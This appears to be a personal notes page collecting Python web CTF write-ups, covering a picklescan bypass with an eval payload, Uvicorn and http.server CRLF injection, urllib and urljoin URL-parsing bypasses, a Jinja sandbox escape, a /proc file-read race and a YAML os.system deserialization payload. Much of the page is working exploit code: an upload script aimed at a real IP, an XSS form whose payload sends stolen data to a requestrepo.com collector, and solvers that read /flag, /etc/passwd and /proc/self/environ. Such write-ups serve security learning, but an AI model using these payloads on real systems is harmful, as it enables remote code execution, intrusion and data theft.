Skip to content

Categories

Python

payloadthats make the innerHTML is appended into non iframe tagfun fact yang easy bisa pakai ipv6 dan itu support scope id seperationhttps://github.com/python/cpython/blob/49fb75c676bd422b03aef9824d1...

Created

Updated

14 min read

Reading time

1 categories

Topics covered

Share:

Tip: for Facebook and LinkedIn, use Copy first, then paste when the platform opens.

Python

pickle scan vulnerabilty bypassing the pickle check

Event NameLilac CTF
GitHub URL-
Challenge NameNailong
Attachments
References

tl;dr

English Version

Analysis

The app is a Streamlit-based PyTorch model loader. It loads models with:

model.load_state_dict(torch.load(model_path, map_location='cpu', weights_only=False))

It also runs picklescan to block malicious pickles.

Vulnerability

We exploit duplicate filenames inside a ZIP archive:

  • Python zipfile (used by picklescan) reads the last occurrence of duplicate names.
  • PyTorch (miniz) reads the first occurrence.
  • So we craft a .pt (ZIP) containing two data.pkl files:

  • First: malicious pickle (executed by PyTorch)
  • Second: safe pickle (scanned by picklescan)
  • Exploit Idea

  • Build a ZIP .pt file with required records (version, byteorder).
  • Insert two data.pkl entries:
    1. The first one runs eval and reads /flag (or common paths).
    2. The second is benign (empty dict).
  • picklescan sees the safe one and allows it.
  • PyTorch loads the malicious one and executes our payload.
  • The flag is placed as a key inside a dict, so load_state_dict prints it as an unexpected key.
  • Payload Core

    class RCE: def reduce(self): return (eval, (expr,))

    malicious_obj = {RCE(): 1}

    Reproduction

    python3 upload_model.py --model payload2.pt --alert-timeout 10

    Output shows:

    Unexpected key(s) in state_dict: "LilacCTF{...}"

    ———

    sender
    #!/usr/bin/env python3
    """Upload a model file to the Streamlit app and click Load.
    
    Usage:
      python3 upload_model.py --model /path/to/model.pt
    """
    
    from __future__ import annotations
    
    import argparse
    import asyncio
    import os
    import sys
    import time
    import uuid
    from typing import Dict, List, Tuple
    
    import requests
    import websockets
    
    # Local stub package with Streamlit protobufs lives under ./streamlit/proto
    sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
    
    from streamlit.proto import BackMsg_pb2  # noqa: E402
    from streamlit.proto import ClientState_pb2  # noqa: E402
    from streamlit.proto import Common_pb2  # noqa: E402
    from streamlit.proto import ForwardMsg_pb2  # noqa: E402
    from streamlit.proto import WidgetStates_pb2  # noqa: E402
    
    
    DEFAULT_BASE_URL = "http://1.95.143.126:8501"
    DEFAULT_MODEL_UPLOADER_ID = "$$ID-ec0db5155bb0a870f99e011bf30119ed-None"
    DEFAULT_LOAD_BUTTON_ID = "$$ID-629307a2f0065ee403debe3206fdc90d-load_button"
    
    def _clear_proxy_env() -> None:
        for key in ("http_proxy", "https_proxy", "HTTP_PROXY", "HTTPS_PROXY"):
            os.environ.pop(key, None)
        os.environ["NO_PROXY"] = "*"
    
    
    def _get_xsrf_cookie(base_url: str) -> str:
        url = base_url.rstrip("/") + "/_stcore/health"
        resp = requests.get(url, timeout=10, proxies={"http": None, "https": None})
        resp.raise_for_status()
        cookie = resp.cookies.get("_streamlit_xsrf")
        if not cookie:
            raise RuntimeError("_streamlit_xsrf cookie not found; check connectivity")
        return cookie
    
    
    def _parse_forward_msgs(raw: bytes) -> List[ForwardMsg_pb2.ForwardMsg]:
        msgs: List[ForwardMsg_pb2.ForwardMsg] = []
        lst = ForwardMsg_pb2.ForwardMsgList()
        try:
            lst.ParseFromString(raw)
        except Exception:
            lst = None
        if lst and lst.messages:
            return list(lst.messages)
        fwd = ForwardMsg_pb2.ForwardMsg()
        fwd.ParseFromString(raw)
        msgs.append(fwd)
        return msgs
    
    
    def _pick_model_uploader(file_uploaders: List[Tuple[str, str]]) -> str | None:
        for wid, label in file_uploaders:
            l = (label or "").lower()
            if "model" in l or "weight" in l or "pth" in l or "pt" in l:
                return wid
        if len(file_uploaders) == 1:
            return file_uploaders[0][0]
        return None
    
    
    def _pick_load_button(buttons: List[Tuple[str, str]]) -> str | None:
        for wid, label in buttons:
            l = (label or "").lower()
            if "load" in l:
                return wid
            if "load_button" in wid:
                return wid
        if len(buttons) == 1:
            return buttons[0][0]
        return None
    
    
    async def _bootstrap(
        ws, base_url: str, timeout: float = 6.0
    ) -> Tuple[str, str, List[Tuple[str, str]], List[Tuple[str, str]]]:
        back = BackMsg_pb2.BackMsg(rerun_script=ClientState_pb2.ClientState())
        await ws.send(back.SerializeToString())
    
        session_id = ""
        page_script_hash = ""
        file_uploaders: List[Tuple[str, str]] = []
        buttons: List[Tuple[str, str]] = []
    
        deadline = time.time() + timeout
        while time.time() < deadline:
            try:
                raw = await asyncio.wait_for(ws.recv(), timeout=deadline - time.time())
            except asyncio.TimeoutError:
                break
    
            if isinstance(raw, str):
                raw = raw.encode("utf-8")
    
            for fwd in _parse_forward_msgs(raw):
                if fwd.HasField("new_session"):
                    session_id = fwd.new_session.initialize.session_id
                    page_script_hash = fwd.new_session.page_script_hash
                if fwd.HasField("delta") and fwd.delta.HasField("new_element"):
                    el = fwd.delta.new_element
                    kind = el.WhichOneof("type")
                    if kind == "file_uploader":
                        fu = el.file_uploader
                        file_uploaders.append((fu.id, fu.label))
                    elif kind == "button":
                        btn = el.button
                        buttons.append((btn.id, btn.label))
    
        if not session_id:
            raise RuntimeError("Failed to obtain session_id from new_session")
        if not page_script_hash:
            raise RuntimeError("Failed to obtain page_script_hash from new_session")
    
        return session_id, page_script_hash, file_uploaders, buttons
    
    
    async def _request_file_urls(ws, session_id: str, filename: str) -> Common_pb2.FileURLs:
        request_id = uuid.uuid4().hex
        req = Common_pb2.FileURLsRequest(
            request_id=request_id, file_names=[filename], session_id=session_id
        )
        back = BackMsg_pb2.BackMsg(file_urls_request=req)
        await ws.send(back.SerializeToString())
    
        deadline = time.time() + 6.0
        while time.time() < deadline:
            raw = await asyncio.wait_for(ws.recv(), timeout=deadline - time.time())
            if isinstance(raw, str):
                raw = raw.encode("utf-8")
            for fwd in _parse_forward_msgs(raw):
                if fwd.HasField("file_urls_response"):
                    resp = fwd.file_urls_response
                    if resp.response_id != request_id:
                        continue
                    if resp.error_msg:
                        raise RuntimeError(f"file_urls_response error: {resp.error_msg}")
                    if not resp.file_urls:
                        raise RuntimeError("file_urls_response empty")
                    return resp.file_urls[0]
        raise RuntimeError("Timed out waiting for file_urls_response")
    
    
    def _normalize_url(base_url: str, url: str) -> str:
        if url.startswith("http://") or url.startswith("https://"):
            return url
        if not url.startswith("/"):
            return base_url.rstrip("/") + "/" + url
        return base_url.rstrip("/") + url
    
    
    def _upload_file(base_url: str, upload_url: str, path: str, xsrf_cookie: str) -> None:
        upload_url = _normalize_url(base_url, upload_url)
        filename = os.path.basename(path)
        headers = {
            "X-Xsrftoken": xsrf_cookie,
            "Cookie": f"_streamlit_xsrf={xsrf_cookie}",
        }
        with open(path, "rb") as f:
            resp = requests.put(
                upload_url,
                files={filename: f},
                timeout=30,
                proxies={"http": None, "https": None},
                headers=headers,
            )
        if resp.status_code >= 400:
            # fallback to generic field name if server rejects filename field
            with open(path, "rb") as f:
                resp = requests.put(
                    upload_url,
                    files={"file": (filename, f)},
                    timeout=30,
                    proxies={"http": None, "https": None},
                    headers=headers,
                )
        resp.raise_for_status()
    
    
    async def _trigger_load(
        ws,
        page_script_hash: str,
        base_url: str,
        uploader_id: str,
        load_button_id: str,
        filename: str,
        file_id: str,
        file_size: int,
    ) -> None:
        file_info = Common_pb2.UploadedFileInfo(
            id=0, name=filename, size=file_size, file_id=file_id
        )
        fu_state = Common_pb2.FileUploaderState(
            max_file_id=1, uploaded_file_info=[file_info]
        )
    
        widget_states = WidgetStates_pb2.WidgetStates()
    
        fu_widget = WidgetStates_pb2.WidgetState(id=uploader_id)
        fu_widget.file_uploader_state_value.CopyFrom(fu_state)
        widget_states.widgets.append(fu_widget)
    
        load_widget = WidgetStates_pb2.WidgetState(id=load_button_id, trigger_value=True)
        widget_states.widgets.append(load_widget)
    
        client_state = ClientState_pb2.ClientState(
            page_script_hash=page_script_hash,
            widget_states=widget_states,
        )
        client_state.context_info.url = base_url.rstrip("/") + "/"
    
        back = BackMsg_pb2.BackMsg(rerun_script=client_state)
        await ws.send(back.SerializeToString())
    
    
    async def _collect_alerts(ws, timeout: float = 6.0) -> List[str]:
        alerts: List[str] = []
        deadline = time.time() + timeout
        while time.time() < deadline:
            try:
                raw = await asyncio.wait_for(ws.recv(), timeout=deadline - time.time())
            except asyncio.TimeoutError:
                break
            except Exception:
                break
            if isinstance(raw, str):
                raw = raw.encode("utf-8")
            for fwd in _parse_forward_msgs(raw):
                if fwd.HasField("delta") and fwd.delta.HasField("new_element"):
                    el = fwd.delta.new_element
                    kind = el.WhichOneof("type")
                    if kind == "alert":
                        body = el.alert.body.strip()
                        if body:
                            alerts.append(body)
        return alerts
    
    
    async def _run(args: argparse.Namespace) -> int:
        _clear_proxy_env()
        base_url = args.base_url.rstrip("/")
        cookie = _get_xsrf_cookie(base_url)
    
        ws_url = base_url.replace("http://", "ws://").replace("https://", "wss://")
        ws_url = ws_url + "/_stcore/stream"
    
        headers = {
            "Cookie": f"_streamlit_xsrf={cookie}",
            "Origin": base_url,
        }
    
        async with websockets.connect(
            ws_url,
            additional_headers=headers,
            max_size=None,
            ping_interval=None,
            open_timeout=10,
        ) as ws:
            session_id, page_script_hash, file_uploaders, buttons = await _bootstrap(ws, base_url)
    
            uploader_id = args.model_uploader_id or _pick_model_uploader(file_uploaders)
            load_button_id = args.load_button_id or _pick_load_button(buttons)
    
            if not uploader_id:
                uploader_id = DEFAULT_MODEL_UPLOADER_ID
            if not load_button_id:
                load_button_id = DEFAULT_LOAD_BUTTON_ID
    
            if args.verbose:
                print("Session:", session_id)
                print("page_script_hash:", page_script_hash)
                print("file_uploaders:", file_uploaders)
                print("buttons:", buttons)
                print("using uploader_id:", uploader_id)
                print("using load_button_id:", load_button_id)
    
            filename = os.path.basename(args.model)
            file_urls = await _request_file_urls(ws, session_id, filename)
    
            _upload_file(base_url, file_urls.upload_url, args.model, cookie)
    
            await _trigger_load(
                ws,
                page_script_hash,
                base_url,
                uploader_id,
                load_button_id,
                filename,
                file_urls.file_id,
                os.path.getsize(args.model),
            )
    
            alerts = await _collect_alerts(ws, timeout=args.alert_timeout)
            if alerts:
                print("\n".join(alerts))
            else:
                print("No alerts received (check the web UI for results).")
    
        return 0
    
    
    def main() -> int:
        parser = argparse.ArgumentParser(description="Upload model and click Load")
        parser.add_argument("--model", required=True, help="Path to model file")
        parser.add_argument(
            "--base-url", default=DEFAULT_BASE_URL, help="Streamlit base URL"
        )
        parser.add_argument("--model-uploader-id", default="", help="Override uploader widget id")
        parser.add_argument("--load-button-id", default="", help="Override load button widget id")
        parser.add_argument("--alert-timeout", type=float, default=6.0)
        parser.add_argument("--verbose", action="store_true")
        args = parser.parse_args()
    
        if not os.path.isfile(args.model):
            print(f"Model file not found: {args.model}", file=sys.stderr)
            return 1
    
        return asyncio.run(_run(args))
    
    
    if __name__ == "__main__":
        raise SystemExit(main())

    payload

    Uvicorn 0day / Nday + Urlib parse 0day + pycache file upload

    Event Name0xl4ugh
    GitHub URL-
    Challenge Name0xClinic
    Attachments
    References

    Uvicorn N-day

    Inspiration

    This was inspired by an n-day we discovered with @ZeyadZonkorany in Uvicorn (FastAPI dependency).

    We reported it a long time ago, but it was ignored.

    Vulnerability

    The issue leads to CRLF injection due to incorrect regex-based header validation in Uvicorn’s httptools implementation: https://github.com/Kludex/uvicorn/blob/main/uvicorn/protocols/http/httptools_impl.py

    HEADER_RE = re.compile(b'[\x00-\x1f\x7f()<>@,;:[]={} \t\\"]')
    HEADER_VALUE_RE = re.compile(b"[\x00-\x08\x0a-\x1f\x7f]")

    Because of incorrect handling of [] inside the character class, validation can be bypassed and malicious bytes can slip through (including CRLF sequences), resulting in CRLF injection.

    Image

    Exploitation

    In our environment, this CRLF bug enabled multiple impacts:

  • CSP bypass

      CRLF can break/ignore Content-Security-Policy headers.

  • Cache poisoning

      CRLF can force headers like:

      response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'

      to be treated as part of the body. Then Nginx may fail to interpret the cache directives, caching responses unexpectedly.

  • XSS

      CRLF lets an attacker inject arbitrary body content without proper filtering, enabling XSS.

  • By chaining these, we can trigger an XSS that affects any user who visits /api/health, even unauthenticated users.

    urlib parse 0day

    Scheme Restriction Bypass (Found ~5 Hours Before the CTF)

    Inspiration

    It was the morning of the CTF — literally a 0-day XD. We were preparing for a journey, and I was casually hacking while commuting when I found it, so I decided to patch the challenge and include it

    Vulnerability

    I observed that urllib accepts an “old URL format”: <URL:scheme://host:port?/path?>

    Example: <URL:http://google.com>

    However, Python’s urlsplit behaves unexpectedly with it:

    from urllib.parse import urlsplit
    
    urls = ["<URL:http://google.com>", "google.com", "http://google.com"]
    for url in urls:
        print(urlsplit(url).scheme if urlsplit(url).scheme else "No scheme")
    
    # No scheme
    # No scheme
    # http

    So the old format is interpreted as having no scheme by urlsplit, even though urlretrieve will still fetch it as a URL.

    The application performs scheme validation like this:

    if urlsplit(file_url).scheme in ["data", "http", "https", "ftp"]:
        return Response(
            content=json.dumps({"status": "error", "message": "Only file:// URLs are allowed"}),
            status_code=400,
            media_type="application/json",
        )
    
    urlretrieve(file_url, UPLOADS_DIR / filename)
    return {
        "status": "success",
        "message": "Document reference accepted",
        "filename": filename,
        "file_url": file_url,
    }

    So the validator blocks http/https/..., but the “old format” bypasses the check.

    Exploit

    Using: <URL:http://attacker/anyfile> bypasses the scheme limitation and allows retrieving remote resources.

    Note: Another solution was to inject a newline (%0a) at the beginning of the URL to break parsing in the validation logic.
    __pycache__ file upload

    Inspiration

    We wanted to end the chain with a satisfying RCE, so we used Siunam’s technique that leverages writing a malicious .so file into a Python environment.

    Vulnerability

    At this stage, we have a restricted file upload with path traversal:

  • Upload is limited by extension
  • But path traversal can place the file in an attacker-chosen location
  • To turn arbitrary file write into RCE in Python, one reliable approach is:

  • Writing shared object (.so) files to hijack/override Python import behavior or related mechanisms
  • Full technique details (already documented): https://siunam321.github.io/research/python-dirty-arbitrary-file-write-to-rce-via-writing-shared-object-files-or-overwriting-bytecode-files/

    Python3 aiohttp url bypass

    Event Nameequinor ctf 2025
    GitHub URLhttps://github.com/ept-team/equinor-ctf-2025/tree/main/writeups/web/Yarr!
    Challenge NameYarr!
    Attachments
    References

    source
    #!/usr/bin/env python3
    
    import os
    import time
    
    from aiohttp import ClientSession, web
    
    with open("index.html", "r") as f:
        index_html = f.read()
    
    
    def filter_bad_characters(text):
        for forbidden_char in ";<=>?@":
            text = text.replace(forbidden_char, ".")
        return text
    
    async def index(_):
        return web.Response(text=index_html, content_type="text/html")
    
    
    async def fetch_game(request):
        game = filter_bad_characters(request.match_info["game"])
    
        async with ClientSession() as session:
            try:
                async with session.get(f"http://{game}.games.ept:80/") as response:
                    text = await response.text()
                    return web.Response(text=text+f" from {response.url}", content_type="text/html")
            except Exception as e:
                return web.Response(text=f"Error fetching game '{game}': {str(e)}", status=500)
    
    
    app = web.Application()
    app.router.add_get("/", index)
    app.router.add_get("/{game:[0-z]+}/", fetch_game)
    web.run_app(app, port=8080)
    
    solve
    import httpx
    import asyncio
    from urllib.parse import quote
    URL = "http://localhost:8080"
    
    class BaseAPI:
        def __init__(self, url=URL) -> None:
            self.c = httpx.AsyncClient(base_url=url)
        def get(self, path: str) -> httpx.Response:
            path = quote(path)
            return self.c.get(f"/{path}/")
    
    class API(BaseAPI):
        ...
    
    async def main():
        api = API()
        res = await api.get("[:x@marks@the@spot@ept[]]")
        print(res.text)
    
    if __name__ == "__main__":
        asyncio.run(main())
    

    URLParse urljoin and urlparse bypass

    Event NameCORCTF 2025
    GitHub URL-
    Challenge Namemsfrognymize2
    Attachments
    References

    def create_file_url(uuid):
        file_url = urljoin("http://127.0.0.1:8000", "/" + uuid)
    
        parsed = urlparse(file_url)
    
        if parsed.scheme != "http":
            raise ValueError("Invalid sheme")
        if parsed.hostname != "127.0.0.1":
            raise ValueError("Invalid host")
        if parsed.port != 8000:
            raise ValueError("Invalid port")
    
        return file_url
    >>> a = urljoin("http://127.0.0.1:8000", "/" + "/vps.dimasc.tf:8000\\@127.0.0.1:8000/")
    >>> a
    'http://vps.dimasc.tf:8000\\@127.0.0.1:8000/'
    >>> urlparse(a)
    ParseResult(scheme='http', netloc='vps.dimasc.tf:8000\\@127.0.0.1:8000', path='/', params='', query='', fragment='')
    >>> 

    Python3 Treat emoji as one character can lead to another vulnerability, in this case is XSS

    Event NameIERAE CTF 2025
    GitHub URL-
    Challenge NameSlide Sandbox
    Attachments
    References

    solve
    import base64
    
    URL = "http://34.146.134.179:3000"
    URL = "http://web:3000"
    JS = b"""
    fetch('/puzzles').then(r => r.json()).then(r => {
        fetch(`http://l7so0kr8.requestrepo.com/?${r[0].title}`, {mode:'no-cors'})
    })
    """
    
    html = f"""
    <html>
      <body>
        <form action="{URL}/create" method="POST">
          <input type="hidden" name="title" value="IERAE" />
          <input type="hidden" name="template" value="<img src=x onerror=eval(atob('{base64.b64encode(JS).decode()}'))>" />
          <input type="hidden" name="answers" value="123456🧩🧩" />
          <input type="submit" value="Submit request" />
        </form>
        <script>
          document.forms[0].submit();
        </script>
      </body>
    </html>
    """
    
    print(html)
    wu
  • Several questions have been asked about emojis. If adding the emoji, ans.length is 10 or more. The following snippet confirms this. "😃".split("")
  •   fetch('/puzzles/' + (new URLSearchParams(location.search)).get('id'))
        .then(r => r.json())
        .then(puzzle => {
          document.getElementById('title').innerText = puzzle.title;
    
          const ans = puzzle.answers.split('').sort(() => Math.random() - 0.5); // Sometimes the puzzles are impossible. Forgive please.      
          ans.forEach((v, i) => {
            pieces.push(document.createElement("div"));
          })
          pieces.push(document.createElement("div"))
    
          for (var i = 0; i < frames.length; i++) {
            frames[i].addEventListener("click", slide);
            frames[i].document.body.appendChild(pieces[i]);
          }
    
          ans.forEach((v, i) => {
            pieces[i].innerHTML = puzzle.template.replaceAll("{{v}}", v);
          })
        });
  • 2025-06-22T21:13:00.000+08:002025-06-22T21:13:00.000+08:002025-06-22T21:13:00.000+08:00

      XSS caused by elements that doesnt get appended to the DOM is as follows. document.createElement("div").innerHTML = "<img src=x onerror=console.log('xss')>"

  •   let pieces = Array();
      fetch('/puzzles/' + (new URLSearchParams(location.search)).get('id'))
        .then(r => r.json())
        .then(puzzle => {
          document.getElementById('title').innerText = puzzle.title;
    
          const ans = puzzle.answers.split('').sort(() => Math.random() - 0.5); // Sometimes the puzzles are impossible. Forgive please.
          ans.forEach((v, i) => {
            pieces.push(document.createElement("div"));
          })
          pieces.push(document.createElement("div"))
    
          for (var i = 0; i < frames.length; i++) {
            frames[i].addEventListener("click", slide);
            frames[i].document.body.appendChild(pieces[i]);
          }
    
          ans.forEach((v, i) => {
            pieces[i].innerHTML = puzzle.template.replaceAll("{{v}}", v);
          })
        });

    thats make the innerHTML is appended into non iframe tag

    Python3 http.server vulnerable to CRLF Injection

    Event NameSAS CTF Quals 2025
    GitHub URL-
    Challenge NameGigaUpload
    Attachments
    References

    
                self.send_response(200)
                self.send_header('Content-Disposition', 'attachment')
                self.send_header('X-File-Name', filename)
                self.send_header('X-File-Encoding', encoding)
                self.send_header('X-File-Content-Type', content_type)
                self.send_header('X-File-Size', file_size)
                self.end_headers()
                self.wfile.write(file_content)
    solve
    import httpx, re
    
    URL = "http://172.26.119.33:4000"
    URL_STORAGE = "http://172.26.119.33:4080"
    
    class BaseAPI:
        def __init__(self, url=URL) -> None:
            self.c = httpx.Client(base_url=url, timeout=999)
        def api_register(self, username, password):
            return self.c.post("/api/register", json={
                "username": username,
                "password": password,
            })
        def api_login(self, username, password):
            return self.c.post("/api/login", json={
                "username": username,
                "password": password,
            })
        def api_upload(self, upload_token):
            return self.c.post(URL_STORAGE+"/", data="""
    ------foobar
    Content-Disposition: form-data; name="upload_token"
    
    {}
    ------foobar
    Content-Disposition: form-data; name="upload"; filename*=raw_unicode_escape''a\\u000d\\u000aContent-Disposition:attachment\\u000d\\u000aContent-Type:text/html
    Content-Type: image/png
    
    <img src=x onerror=alert(1)>
    """.format(upload_token).strip()+"\r\n", headers={"Content-Type": "multipart/form-data; boundary=----foobar"})
    class API(BaseAPI):
        def upload_token(self):
            res = self.c.get("/upload")
            token = re.findall(r'name="upload_token" value="(.*?)"', res.text)[0]
            return token
    if __name__ == "__main__":
        api = API()
        username = "test123123123123"
        password = "test123123123123"
        res = api.api_register(username, password)
        print(res.json())
        res = api.api_login(username, password)
        print(res.json())
        upload_token = api.upload_token()
        print(upload_token)
        res = api.api_upload(
            upload_token=upload_token
        )
        print(res.text)

    Python library injection

    Event Nameb01lersc CTF 2025
    GitHub URL-
    Challenge Namemusicplayer
    Attachments
    References

  • tarslip to get arbitrary write
  • https://www.sonarsource.com/blog/pretalx-vulnerabilities-how-to-get-accepted-at-every-conference/#code-execution-via-sitespecific-configuration-hooks to get RCE on server reload
  • upload a .py file to reload server
  • asd

    fun fact yang easy bisa pakai ipv6 dan itu support scope id seperation

    https://github.com/python/cpython/blob/49fb75c676bd422b03aef9824d1abca1e9d90193/Lib/ipaddress.py#L1882

        def _split_scope_id(ip_str):
            """Helper function to parse IPv6 string address with scope id.
    
            See RFC 4007 for details.
    
            Args:
                ip_str: A string, the IPv6 address.
    
            Returns:
                (addr, scope_id) tuple.
    
            """
            addr, sep, scope_id = ip_str.partition('%')
            if not sep:
                scope_id = None
            elif not scope_id or '%' in scope_id:
                raise AddressValueError('Invalid IPv6 address: "%r"' % ip_str)
            return addr, scope_id
    from ipaddress import ip_address
    
    print(ip_address('2001:0db8:85a3:0000:0000:8a2e:0370:7334%&ls'))

    in python version 3.10 something you can bypass urlib parse with ” ”

    wsgi template injection technique if we can upload PDF with arbitary path control

    https://youtu.be/b_pqftkAk9w?t=2149

    Jinja using template that

    cr3 CTF 2024

    import httpx
    
    URL = "https://shippering.1337.sb"
    
    class BaseAPI:
        def __init__(self, url=URL) -> None:
            self.c = httpx.Client(base_url=url)
        def home(self, encoding, person_1, person_2):
            return self.c.post("/", data={
                "person_1": person_1,
                "person_2": person_2,
                "method": encoding,
            })
    class API(BaseAPI):
        ...
    # instance overiding, bypassing jinja sandbox
    # because jinja using strict type checking, if the instance checking get modified, it will us can escape jinja sandboxing using something like newline and quote
    """
    _isinstance = isinstance
    
    
    def isinstance_hk(x, y):
        f = extract_stack(limit=2)
        # Fixing the stupid bugs by myself -_-
        if y is not list and len(f) > 0 and 'site-packages' in str(f[0].filename) and not any(
                x in str(f[0].filename) for x in [
                    'fastapi',
                    'pydantic',
                    'typing',
                    'click',
                    'uvicorn',
                    'h11',
                    'starlette',
                    'multipart',
                    'slowapi',
                    'limits',
                    'lexer',
                    'nodes',
                    'visitor',
                ]
        ):
            return True
        return _isinstance(x, y)
    
    
    isinstance_hk.__globals__['__builtins__']['isinstance'] = isinstance_hk
    """
    
    if __name__ == "__main__":
        api = API()
        res = api.home("_Renderer__old", "{% if \"True:\n        for x in open(\\\"/flag\\\"):\n                yield x\n                #\" %}{%PERSON2%}{% endif %}", "x")
        print(res.text)
    

    H11 Proxy + Starlette

    File read with 0 lenght restriction

    Project Sekai 2024

    belated wu for funny-lfr, intended way to exploit the race is: req a: open_file(/etc/passwd) -> fd=X (any file bigger than environ works

    https://github.com/python-hyper/h11/blob/master/h11/_writers.py#L90

    ) req b: os.stat(/proc/self/fd/X) -> /etc/passwd req a: close fd=X req c: open_file(/proc/self/environ) -> fd=X req b: file.read(/proc/self/fd/X)

    from starlette.applications import Starlette
    from starlette.routing import Route
    from starlette.responses import FileResponse
    
    
    async def download(request):
        return FileResponse(request.query_params.get("file"))
    
    
    app = Starlette(routes=[Route("/", endpoint=download)])
    

    solver

    import sys
    import socket
    from concurrent.futures import ThreadPoolExecutor
    
    URL = "http://localhost:1337/"
    
    class BaseAPI:
        def __init__(self, url=URL) -> None:
            self.url = url
            self.host, self.port = self._parse_url(url)
    
        def _parse_url(self, url):
            parts = url.split("//")[1].split("/")[0].split(":")
            host = parts[0]
            port = int(parts[1]) if len(parts) > 1 else 80
            return host, port
    
        def file(self, path):
            return self.make_request("GET", "/", params={"file": path})
    
    class API(BaseAPI):
        def make_request(self, method, path, params=None, headers=None, data=None):
            query = f"?{'&'.join(f'{k}={v}' for k, v in params.items())}" if params else ""
            headers = headers or {"Host": self.host}
            request = (
                f"{method} {path}{query} HTTP/1.1\r\n"
                + "".join(f"{k}: {v}\r\n" for k, v in headers.items())
                + "\r\n"
                + (data or "")
            )
            return request.encode()
    
        def file_raw(self, path):
            request = self.make_request("GET", "/", params={"file": path})
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.connect((self.host, self.port))
                s.sendall(request)
                response = []
                while True:
                    data = s.recv(4096)
                    if not data:
                        break
                    response.append(data)
            return b"".join(response)
    
    def worker(api, path):
        try:
            result = api.file_raw(path)
            if b"FLAG" in result:
                print(result.decode().replace("\r", "").strip())
                sys.exit(0)
        except Exception as e:
            print(f"Error: {e}")
    
    def main():
        api = API()
        paths = [
            "/proc/self/environ", "/etc/passwd", "/proc/self/fd/7",
            "/proc/self/fd/8", "/proc/self/fd/9", "/proc/self/fd/10",
            "/proc/self/fd/11", "/proc/self/fd/12",
        ]
    
        with ThreadPoolExecutor(max_workers=50) as executor:
            while True:
                futures = [executor.submit(worker, api, path) for _ in range(50) for path in paths]
                for future in futures:
                    if future.result() is not None:
                        return
    
    if __name__ == "__main__":
        main()

    Yaml deser

    payload = {
        'file': ('test.txt', b'''!<tag:yaml.org,2002:python/object/apply:os.system> [
      \'ls -la / > /dev/shm/testing.txt\',
    ]''')
    }

    URL Parse bypass

    from urllib.parse import urlparse
    from urllib.parse import urlparse
    import requests
    payload = "http://127.0.0.1:5555\\@www.bssn.go.id/"
    url = urlparse(payload)
    print(url.hostname)
    
    req = requests.get(payload)
    print(req.text)

    Pydash cve in flask can gain rce

    pydash==5.1.2

    https://ctftime.org/writeup/36082

    https://adworld.xctf.org.cn/match/list?event_hash=fb6d5b70-beac-11ef-a39b-000c297261bb

    su_blog

    Image

    ❓ Werkzeug bad cookie parsing

    Another HTML Renderer | mizu.re

    Categories & Topics

    This note is categorized under the following topics. Click on any category to explore more related content.

    Share this note

    Share:

    Tip: for Facebook and LinkedIn, use Copy first, then paste when the platform opens.